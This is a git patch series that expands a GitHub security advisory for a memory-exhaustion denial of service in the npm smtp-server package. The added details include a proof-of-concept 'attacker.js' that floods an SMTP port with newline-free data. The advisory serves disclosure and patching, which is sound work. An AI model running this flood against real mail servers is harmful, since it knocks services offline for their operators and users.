From 869eed67af595d2798397dead2f572ad607adf4c Mon Sep 17 00:00:00 2001
From: Gavin Stuart <46635587+blue2cat@users.noreply.github.com>
Date: Fri, 15 May 2026 14:52:17 -0700
Subject: [PATCH 1/2] Improve GHSA-fv2f-rw9f-v9cm

---
 .../GHSA-fv2f-rw9f-v9cm.json                  | 30 +++++++++++++++++--
 1 file changed, 27 insertions(+), 3 deletions(-)

diff --git a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
index 12296f9f374a1..ef1ad9a836ebe 100644
--- a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
+++ b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
@@ -1,19 +1,43 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-fv2f-rw9f-v9cm",
-  "modified": "2026-05-15T18:30:33Z",
+  "modified": "2026-05-15T18:31:38Z",
   "published": "2026-05-15T15:30:45Z",
   "aliases": [
     "CVE-2026-38728"
   ],
-  "details": "An issue in Nodemailer smtp_server before v.3.18.3 allows a remote attacker to cause a denial of service via the SMTPStream._write, lib/smtp-stream.js components",
+  "summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
+  "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\n**Who is impacted:** Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\n**Severity:** High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "smtp-server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": ">= 3.18.3"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "< 3.18.3"
+      }
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",

From 78f1ff368abcb8962857e2f5304b3ee4deb940d9 Mon Sep 17 00:00:00 2001
From: Gavin Stuart <46635587+blue2cat@users.noreply.github.com>
Date: Fri, 15 May 2026 15:42:47 -0700
Subject: [PATCH 2/2] Improve GHSA-fv2f-rw9f-v9cm

---
 .../2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json | 9 +++------
 1 file changed, 3 insertions(+), 6 deletions(-)

diff --git a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
index ef1ad9a836ebe..1fea8bb6db204 100644
--- a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
+++ b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
@@ -7,7 +7,7 @@
     "CVE-2026-38728"
   ],
   "summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
-  "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\n**Who is impacted:** Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\n**Severity:** High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
+  "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\nWho is impacted: Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\nSeverity: High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
   "severity": [
     {
       "type": "CVSS_V3",
@@ -28,14 +28,11 @@
               "introduced": "0"
             },
             {
-              "fixed": ">= 3.18.3"
+              "fixed": "3.18.3"
             }
           ]
         }
-      ],
-      "database_specific": {
-        "last_known_affected_version_range": "< 3.18.3"
-      }
+      ]
     }
   ],
   "references": [